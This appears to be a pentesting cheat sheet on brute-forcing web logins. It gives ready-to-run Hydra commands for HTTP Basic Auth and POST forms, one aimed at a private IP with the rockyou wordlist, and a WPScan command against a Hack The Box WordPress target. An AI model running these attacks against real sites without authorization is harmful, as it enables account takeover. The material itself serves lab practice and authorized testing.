# Brute Forcing Web Forms

### HTTP Basic Auth 

Bruteforce HTTP Basic Auth 

```
hydra -L users.lst -P passwords.txt -f www.site.org http-head /path/of/target/ -V 
```

Flags:

* `-V`: verbose mode
* `-f`: exit after the first login pair is found

### HTTP POST

Bruteforcing HTTP POST form: 

```
hydra http-form-post "login_path:form_username_name=^USER^&form_password_name=^PASS^:failed_login_text" -l username -P passwords_wordlist.txt -t 10
```

Options:

* `login_path`: The URL of the login form, e.g `/login.php`.
* `form_username_name`: The "name" variable of the username input field of the form.
* `form_password_name`: The "name" variable of the password input field of the form.
* `failed_login_text`: Text which indicates to Hydra that the login failed, for example "Invalid Credentials."
* `username`: The username of the user you want to brute force.

Flags:

* `-t`: The number of threads.
* `-l`: Specifies the username of the user to brute force.
* `-L`: Specifies a wordlist of usernames to brute force.
* `-P`: Specifies a wordlist of passwords to brute force.

Example use where a failed login redirected to a page with a `?error=1` GET parameter: 

```
hydra 192.168.101.10 http-form-post "/index.php?module=Users&action=Login:__vtrftk=sid%3A9db267cda06a381fdff01c51a36d2362551c82c2%2C1527426288&username=^USER^&password=^PASS^:error=1" -P /usr/share/wordlists/rockyou.txt -t 64 -l admin
```

### WordPress login

Brute forcing WordPress logins using WPScan:

```
wpscan --url https://brainfuck.htb --passwords /home/x90slide/resources/SecLists/Passwords/Leaked-Databases/rockyou.txt --usernames admin,orestis --disable-tls-checks
```